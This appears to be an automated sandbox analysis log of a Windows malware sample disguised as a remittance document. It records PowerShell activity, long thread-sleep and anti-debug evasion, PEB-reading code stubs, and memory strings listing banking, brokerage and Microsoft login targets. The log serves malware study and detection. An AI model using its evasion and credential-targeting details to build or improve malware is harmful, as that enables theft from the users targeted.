            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: 4TH HIRE SOA REMITTANCE_USD280,000.exe PID: 7112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: GRogNEHvcL.exe PID: 7280, type: MEMORYSTR
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 6BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 98B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: A8B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 8560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 9560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 84D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E rdtsc 9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4439Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5264Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 486Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 9781
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe TID: 5760Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep count: 4439 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4280Thread sleep count: 252 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep count: 189 > 30
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep time: -378000s >= -30000s
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep count: 9781 > 30
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep time: -19562000s >= -30000s
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696428655p
            Source: Y656-D6L1.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: firefox.exe, 00000015.00000002.2624285983.000001C34CB2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::9P
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2093278786.0000000006F61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\!b
            Source: Y656-D6L1.17.drBinary or memory string: discord.comVMware20,11696428655f
            Source: Y656-D6L1.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: global block list test formVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Y656-D6L1.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Y656-D6L1.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Y656-D6L1.17.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Y656-D6L1.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: winver.exe, 00000011.00000002.4494261459.00000000032B6000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4494566659.000000000157F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Y656-D6L1.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Y656-D6L1.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Y656-D6L1.17.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saction PasswordVMware20,11696428655^
            Source: Y656-D6L1.17.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Y656-D6L1.17.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Y656-D6L1.17.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Y656-D6L1.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,1169642
            Source: Y656-D6L1.17.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Y656-D6L1.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696428655n
            Source: Y656-D6L1.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E rdtsc 9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004174C3 LdrLoadDll,9_2_004174C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01834180 mov eax, dword ptr fs:[00000030h]9_2_01834180
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01814000 mov ecx, dword ptr fs:[00000030h]9_2_01814000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178C0F0 mov eax, dword ptr fs:[00000030h]9_2_0178C0F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D20F0 mov ecx, dword ptr fs:[00000030h]9_2_017D20F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017980E9 mov eax, dword ptr fs:[00000030h]9_2_017980E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0178A0E3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826030 mov eax, dword ptr fs:[00000030h]9_2_01826030
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01816050 mov eax, dword ptr fs:[00000030h]9_2_01816050
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017880A0 mov eax, dword ptr fs:[00000030h]9_2_017880A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179208A mov eax, dword ptr fs:[00000030h]9_2_0179208A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018163C0 mov eax, dword ptr fs:[00000030h]9_2_018163C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184C3CD mov eax, dword ptr fs:[00000030h]9_2_0184C3CD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018343D4 mov eax, dword ptr fs:[00000030h]9_2_018343D4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018343D4 mov eax, dword ptr fs:[00000030h]9_2_018343D4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov eax, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov eax, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov ecx, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov eax, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178C310 mov ecx, dword ptr fs:[00000030h]9_2_0178C310
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B0310 mov ecx, dword ptr fs:[00000030h]9_2_017B0310
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA30B mov eax, dword ptr fs:[00000030h]9_2_017CA30B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA30B mov eax, dword ptr fs:[00000030h]9_2_017CA30B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA30B mov eax, dword ptr fs:[00000030h]9_2_017CA30B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C63FF mov eax, dword ptr fs:[00000030h]9_2_017C63FF
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F0 mov eax, dword ptr fs:[00000030h]9_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F0 mov eax, dword ptr fs:[00000030h]9_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F0 mov eax, dword ptr fs:[00000030h]9_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
